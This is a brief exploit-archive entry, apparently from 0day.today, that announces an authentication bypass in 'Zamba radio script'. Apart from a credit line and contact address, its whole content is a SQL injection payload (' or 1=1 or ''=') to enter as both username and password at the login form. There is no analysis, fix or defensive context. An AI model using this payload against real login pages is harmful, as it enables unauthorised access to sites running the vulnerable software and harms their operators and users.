id: 12038
date: 04/28/2010
title: Zamba radio script Authentication Bypass
author: Poltergeisth4cker
cves: 

========================================
zamba radio script Authentication Bypass
========================================

found by: Poltergeisth4cker (from netherlands)
TEAM: No team
Contact: Poltergeisth4cker(at)hotmail.com
Dork: no scriptkiddies
 
---------------------------------------------------------------------------
 
login:P 

username: ' or 1=1 or ''='
password: ' or 1=1 or ''='



#  0day.today [2023-03-27]  #